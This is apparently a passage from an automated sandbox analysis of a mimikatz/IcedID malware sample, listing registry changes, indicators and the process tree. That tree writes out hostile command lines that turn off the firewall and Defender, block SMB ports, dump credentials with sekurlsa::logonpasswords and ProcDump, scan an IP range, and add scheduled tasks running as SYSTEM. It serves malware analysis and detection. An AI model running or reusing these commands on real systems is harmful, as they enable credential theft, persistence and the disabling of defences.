\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yaytfet.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" yaytfet.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yaytfet.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yaytfet.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yaytfet.exe Key created \REGISTRY\USER\.DEFAULT\Software gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yaytfet.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 224 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1720 schtasks.exe 1840 schtasks.exe 2188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2956 yaytfet.exe Token: SeDebugPrivilege 4608 yaytfet.exe Token: SeDebugPrivilege 3444 vfshost.exe Token: SeDebugPrivilege 3140 gtfbuuhyt.exe Token: SeLockMemoryPrivilege 1676 qesayc.exe Token: SeLockMemoryPrivilege 1676 qesayc.exe Token: SeDebugPrivilege 5096 gtfbuuhyt.exe Token: SeDebugPrivilege 5068 gtfbuuhyt.exe Token: SeDebugPrivilege 4412 gtfbuuhyt.exe Token: SeDebugPrivilege 64 gtfbuuhyt.exe Token: SeDebugPrivilege 1212 gtfbuuhyt.exe Token: SeDebugPrivilege 2652 gtfbuuhyt.exe Token: SeDebugPrivilege 3080 gtfbuuhyt.exe Token: SeDebugPrivilege 2456 gtfbuuhyt.exe Token: SeDebugPrivilege 1480 gtfbuuhyt.exe Token: SeDebugPrivilege 2596 gtfbuuhyt.exe Token: SeDebugPrivilege 3412 gtfbuuhyt.exe Token: SeDebugPrivilege 4460 gtfbuuhyt.exe Token: SeDebugPrivilege 1372 gtfbuuhyt.exe Token: SeDebugPrivilege 2460 gtfbuuhyt.exe Token: SeDebugPrivilege 3344 gtfbuuhyt.exe Token: SeDebugPrivilege 3856 gtfbuuhyt.exe Token: SeDebugPrivilege 3884 gtfbuuhyt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe 2956 yaytfet.exe 2956 yaytfet.exe 4608 yaytfet.exe 4608 yaytfet.exe 4184 xohudmc.exe 448 dipzew.exe 1212 yaytfet.exe 1212 yaytfet.exe 5116 yaytfet.exe 5116 yaytfet.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1840 wrote to memory of 2300 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe 82 PID 1840 wrote to memory of 2300 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe 82 PID 1840 wrote to memory of 2300 1840 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe 82 PID 2300 wrote to memory of 224 2300 cmd.exe 84 PID 2300 wrote to memory of 224 2300 cmd.exe 84 PID 2300 wrote to memory of 224 2300 cmd.exe 84 PID 2300 wrote to memory of 2956 2300 cmd.exe 92 PID 2300 wrote to memory of 2956 2300 cmd.exe 92 PID 2300 wrote to memory of 2956 2300 cmd.exe 92 PID 4608 wrote to memory of 5080 4608 yaytfet.exe 94 PID 4608 wrote to memory of 5080 4608 yaytfet.exe 94 PID 4608 wrote to memory of 5080 4608 yaytfet.exe 94 PID 5080 wrote to memory of 3360 5080 cmd.exe 96 PID 5080 wrote to memory of 3360 5080 cmd.exe 96 PID 5080 wrote to memory of 3360 5080 cmd.exe 96 PID 5080 wrote to memory of 940 5080 cmd.exe 97 PID 5080 wrote to memory of 940 5080 cmd.exe 97 PID 5080 wrote to memory of 940 5080 cmd.exe 97 PID 5080 wrote to memory of 1476 5080 cmd.exe 98 PID 5080 wrote to memory of 1476 5080 cmd.exe 98 PID 5080 wrote to memory of 1476 5080 cmd.exe 98 PID 5080 wrote to memory of 2772 5080 cmd.exe 99 PID 5080 wrote to memory of 2772 5080 cmd.exe 99 PID 5080 wrote to memory of 2772 5080 cmd.exe 99 PID 5080 wrote to memory of 3164 5080 cmd.exe 100 PID 5080 wrote to memory of 3164 5080 cmd.exe 100 PID 5080 wrote to memory of 3164 5080 cmd.exe 100 PID 5080 wrote to memory of 3968 5080 cmd.exe 101 PID 5080 wrote to memory of 3968 5080 cmd.exe 101 PID 5080 wrote to memory of 3968 5080 cmd.exe 101 PID 4608 wrote to memory of 3280 4608 yaytfet.exe 102 PID 4608 wrote to memory of 3280 4608 yaytfet.exe 102 PID 4608 wrote to memory of 3280 4608 yaytfet.exe 102 PID 4608 wrote to memory of 696 4608 yaytfet.exe 104 PID 4608 wrote to memory of 696 4608 yaytfet.exe 104 PID 4608 wrote to memory of 696 4608 yaytfet.exe 104 PID 4608 wrote to memory of 2160 4608 yaytfet.exe 106 PID 4608 wrote to memory of 2160 4608 yaytfet.exe 106 PID 4608 wrote to memory of 2160 4608 yaytfet.exe 106 PID 4608 wrote to memory of 784 4608 yaytfet.exe 111 PID 4608 wrote to memory of 784 4608 yaytfet.exe 111 PID 4608 wrote to memory of 784 4608 yaytfet.exe 111 PID 784 wrote to memory of 5116 784 cmd.exe 113 PID 784 wrote to memory of 5116 784 cmd.exe 113 PID 784 wrote to memory of 5116 784 cmd.exe 113 PID 5116 wrote to memory of 3988 5116 wpcap.exe 114 PID 5116 wrote to memory of 3988 5116 wpcap.exe 114 PID 5116 wrote to memory of 3988 5116 wpcap.exe 114 PID 3988 wrote to memory of 4048 3988 net.exe 116 PID 3988 wrote to memory of 4048 3988 net.exe 116 PID 3988 wrote to memory of 4048 3988 net.exe 116 PID 5116 wrote to memory of 2224 5116 wpcap.exe 117 PID 5116 wrote to memory of 2224 5116 wpcap.exe 117 PID 5116 wrote to memory of 2224 5116 wpcap.exe 117 PID 2224 wrote to memory of 64 2224 net.exe 119 PID 2224 wrote to memory of 64 2224 net.exe 119 PID 2224 wrote to memory of 64 2224 net.exe 119 PID 5116 wrote to memory of 4424 5116 wpcap.exe 120 PID 5116 wrote to memory of 4424 5116 wpcap.exe 120 PID 5116 wrote to memory of 4424 5116 wpcap.exe 120 PID 4424 wrote to memory of 3048 4424 net.exe 122 PID 4424 wrote to memory of 3048 4424 net.exe 122 PID 4424 wrote to memory of 3048 4424 net.exe 122 PID 5116 wrote to memory of 3828 5116 wpcap.exe 123
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1864
-
C:\Windows\TEMP\syfgusilh\qesayc.exe"C:\Windows\TEMP\syfgusilh\qesayc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nflfrgth\yaytfet.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:224
-
-
C:\Windows\nflfrgth\yaytfet.exeC:\Windows\nflfrgth\yaytfet.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2956
-
-
-
C:\Windows\nflfrgth\yaytfet.exeC:\Windows\nflfrgth\yaytfet.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3360
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3164
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3280
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:696
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bpzelrleu\etctgsilg\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\bpzelrleu\etctgsilg\wpcap.exeC:\Windows\bpzelrleu\etctgsilg\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4048
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:64
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3048
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:2488
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1804
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1336
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4572
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1052
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bpzelrleu\etctgsilg\efgtnfata.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bpzelrleu\etctgsilg\Scant.txt2⤵PID:4952
-
C:\Windows\bpzelrleu\etctgsilg\efgtnfata.exeC:\Windows\bpzelrleu\etctgsilg\efgtnfata.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bpzelrleu\etctgsilg\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bpzelrleu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bpzelrleu\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2468 -
C:\Windows\bpzelrleu\Corporate\vfshost.exeC:\Windows\bpzelrleu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lcyfubsfi" /ru system /tr "cmd /c C:\Windows\ime\yaytfet.exe"2⤵PID:3932
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lcyfubsfi" /ru system /tr "cmd /c C:\Windows\ime\yaytfet.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfythwfig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F"2⤵PID:4968
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfythwfig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "huhnyrbea" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F"2⤵PID:1500
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "huhnyrbea" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2188
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4016
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3172
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2008
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3424
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1804
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2340
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1412
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4924
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4992
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:2044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4348
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1600
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3820
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4640
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:5064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:548
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4540
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:3204
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3012
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3092
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:64
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2224
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3932
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:1212
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3112
-
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 792 C:\Windows\TEMP\bpzelrleu\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4184
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 384 C:\Windows\TEMP\bpzelrleu\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 1864 C:\Windows\TEMP\bpzelrleu\1864.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2656 C:\Windows\TEMP\bpzelrleu\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2804 C:\Windows\TEMP\bpzelrleu\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2860 C:\Windows\TEMP\bpzelrleu\2860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 316 C:\Windows\TEMP\bpzelrleu\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 3768 C:\Windows\TEMP\bpzelrleu\3768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 3864 C:\Windows\TEMP\bpzelrleu\3864.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 3924 C:\Windows\TEMP\bpzelrleu\3924.dmp2⤵
